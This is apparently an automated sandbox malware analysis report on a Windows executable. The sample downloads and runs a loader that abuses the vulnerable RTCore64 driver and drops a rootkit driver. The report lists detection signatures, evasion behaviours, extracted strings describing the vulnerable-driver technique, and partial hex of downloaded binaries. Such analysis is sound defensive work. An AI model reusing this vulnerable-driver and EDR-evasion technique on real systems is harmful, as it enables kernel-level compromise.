Windows Analysis Report
lUAc7lqa56.exe

Overview

General Information

Sample name: lUAc7lqa56.exe
renamed because original name is a hash value
Original sample name: 4c428e14cf5fc2c5e54ba377389c8253.exe
Analysis ID: 1541826
MD5: 4c428e14cf5fc2c5e54ba377389c8253
SHA1: bb3972cfb6adc178d8fd17dde519d15a6471e4b9
SHA256: f142f2fefbbd174fbc0d3d6cbe4cb5caa48389dfce9ee63f10d82b503e705468
Tags: 64exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Accesses win32k, likely to find offsets for exploits
Detected VMProtect packer
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Sample is not signed and drops a device driver
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by executing special instructions (VM detection)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to load drivers
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables driver privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Spawns drivers
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

Source: lUAc7lqa56.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys Avira: detection malicious, Label: RKIT/Agent.ykqds
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe Avira: detection malicious, Label: TR/Crypt.Agent.czxpy
Source: C:\Windows\Vulnerability.exe Avira: detection malicious, Label: TR/Crypt.Agent.czxpy
Source: C:\Windows\driverfo.sys Avira: detection malicious, Label: RKIT/Agent.ykqds
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys ReversingLabs: Detection: 33%
Source: C:\Windows\Vulnerability.exe ReversingLabs: Detection: 55%
Source: C:\Windows\driverfo.sys ReversingLabs: Detection: 33%
Source: lUAc7lqa56.exe ReversingLabs: Detection: 37%
Source: lUAc7lqa56.exe Virustotal: Detection: 29%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe Joe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exe Joe Sandbox ML: detected
Source: lUAc7lqa56.exe Joe Sandbox ML: detected
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_50b8f276-7

Exploits

Source: C:\Windows\Vulnerability.exe File opened: C:\Windows\System32\win32k.sys
Source: unknown HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: lUAc7lqa56.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb. source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb0 source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb2u.dllK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbAy> source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\os\obj\amd64fre\onecoreuap\windows\core\kmode\moderncore\objfre\amd64\typeinfo\win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879045308.000002181DC7C000.00000004.00000020.00020000.00000000.sdmp, AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob.4.dr, 74b74f1f14570c9cf7868ff6d4bda773.pdb.4.dr
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879638400.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881318765.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880040885.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbZ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbY source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /win32k.pdb" source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbiz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdb % source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb_ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!x source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5n source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbYz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb)y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798931127.00000245E10C0000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb@ source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1797006532.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols4b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5zs source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb7 source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbm]g source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb1y. source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ddhttps://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c9cf7868ff6d4bda773.pdbv source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb;k source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbFranciscw source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb\ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC423B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 4_2_00007FF7CC423B60
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 06:10:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 17:41:18 GMTETag: "23800-623960fde9891"Accept-Ranges: bytesContent-Length: 145408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 
72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 Oct 2024 06:10:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sat, 19 Oct 2024 00:07:08 GMTETag: "4d00-624c93353bec7"Accept-Ranges: bytesContent-Length: 19712Keep-Alive: timeout=5, max=99Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 d4 f7 12 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 